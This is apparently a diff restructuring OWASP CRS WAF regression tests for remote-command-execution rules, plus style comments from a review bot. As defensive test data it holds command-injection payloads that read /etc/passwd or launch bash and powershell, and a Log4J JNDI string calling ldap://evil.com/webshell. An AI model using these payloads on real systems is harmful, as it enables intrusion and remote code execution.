headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /[?]tc/pa[?]swd + uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 10 desc: "Unix command injection - character set bypass - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # hello [text in brackets] - uri: 
"/get?cmd=hello%20%5Btext%20in%20brackets%5D" - version: HTTP/1.0 - output: - no_log_contains: id "932130" - - test_title: 932130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # hello [text in brackets] + uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" + version: HTTP/1.0 + output: + no_log_contains: id "932130" + - test_id: 11 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/pas[s]wd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/pas[s]wd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 12 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bp%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bp%5Dasswd" + version: HTTP/1.0 + output: + 
log_contains: id "932130" + - test_id: 13 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5B!q%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5B!q%5Dasswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 14 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bm-z%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bm-z%5Dasswd" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 15 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-16 + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" + version: HTTP/1.0 + output: + log_contains: id "932130" + - test_id: 16 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?exec=/bi%5Bn%5D/bash" - version: HTTP/1.0 - output: - log_contains: id "932130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?exec=/bi%5Bn%5D/bash" + version: HTTP/1.0 + output: + log_contains: id "932130" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml index 378089c7c..155462cee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml 
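Review bot: The section mixes two quoting conventions for the same fields: tests 1–6 write `dest_addr: "127.0.0.1"`, `method: "GET"`, `version: "HTTP/1.1"` and `log_contains: 'id "932130"'`, while tests 7–16 use bare `127.0.0.1`, `GET`, `HTTP/1.0` and the plain scalar `id "932130"`. Since the reindent already touches every line, picking one style across the file would keep later diffs small; the plain `id "932130"` form in particular relies on YAML tolerating embedded double quotes inside a plain scalar. The HTTP/1.0 versus HTTP/1.1 split between the two halves may be deliberate, but a one-line comment saying so would stop the next reader from "fixing" it.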
@@ -1,39 +1,36 @@
 ---
 meta:
 author: "dune73, Max Leske, azurit"
- enabled: true
- name: "932131.yaml"
 description: "Tests to trigger or not trigger rule 932131"
+rule_id: 932131
 tests:
- - test_title: 932131-1
+ - test_id: 1
 desc: Log4J test with evasion
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- headers:
- Accept: "*/*"
- User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}"
- Host: "localhost"
- method: "GET"
- port: 80
- uri: "/get"
- version: "HTTP/1.1"
- output:
- log_contains: id "932131"
- - test_title: 932131-2
+ - input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ User-Agent: "OWASP CRS test agent ${:1337:-x$}{jndi:ldap://evil.com/webshell}"
+ Host: "localhost"
+ method: "GET"
+ port: 80
+ uri: "/get"
+ version: "HTTP/1.1"
+ output:
+ log_contains: id "932131"
+ - test_id: 2
 desc: False positive against Facebook for Android user agent
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- headers:
- Accept: "*/*"
- User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]"
- Host: "localhost"
- method: "GET"
- port: 80
- uri: "/get"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "932131"
+ - input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ User-Agent: "mozilla/5.0(linux android 12 sm-a528b build/sp1a.210812.016 wv) applewebkit/537.36(khtml like gecko) version/4.0 chrome/110.0.5481.154 mobile safari/537.36 [fb_iab/fb4a fbav/403.0.0.27.81 ]"
+ Host: "localhost"
+ method: "GET"
+ port: 80
+ uri: "/get"
+ version: "HTTP/1.1"
+ output:
+ no_log_contains: id "932131"
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
index a105ef47d..b7dff9301 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml
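Review bot: Scalar quoting in the rewritten test bodies of 932131.yaml is inconsistent with the sibling files in this patch: here `dest_addr: "127.0.0.1"`, `method: "GET"` and `version: "HTTP/1.1"` are quoted, while the 932130 and 932140 hunks write the same keys plain (`dest_addr: 127.0.0.1`, `method: GET`, `version: HTTP/1.0`), and since the commit already rewrites every one of these lines it is the moment to settle on one convention. The expected-log fragments are plain scalars carrying embedded double quotes (`log_contains: id "932131"`, `no_log_contains: id "932131"`); they parse to the intended string, but they read as if the quotes were YAML syntax, and `log_contains: 'id "932131"'` makes the matched substring explicit. Both points are style only; the hunk is complete in view.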
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml 
@@ -2,2540 +2,2381 @@ meta: author: "fgsch, azurit" description: Tests for Windows for command - enabled: true - name: 932140.yaml +rule_id: 932140 tests: - - test_title: 932140-1 + - test_id: 1 desc: for % stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 2 desc: for %% stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 3 desc: for /d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 4 desc: for /r stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 5 desc: for /l stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 6 desc: for /f .. fileset stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 7 desc: for /f .. 
"string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 8 desc: for /f .. 'command' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 9 desc: for /f .. 
`command` stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-10 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-11 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-12 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-13 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-14 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-15 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-16 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-17 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - 
version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-18 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-19 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-20 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-21 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-22 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: 
"OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-23 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-24 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-25 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-26 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-27 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-28 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-29 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-30 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-31 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-32 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-33 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-34 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-35 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-36 - desc: imported 
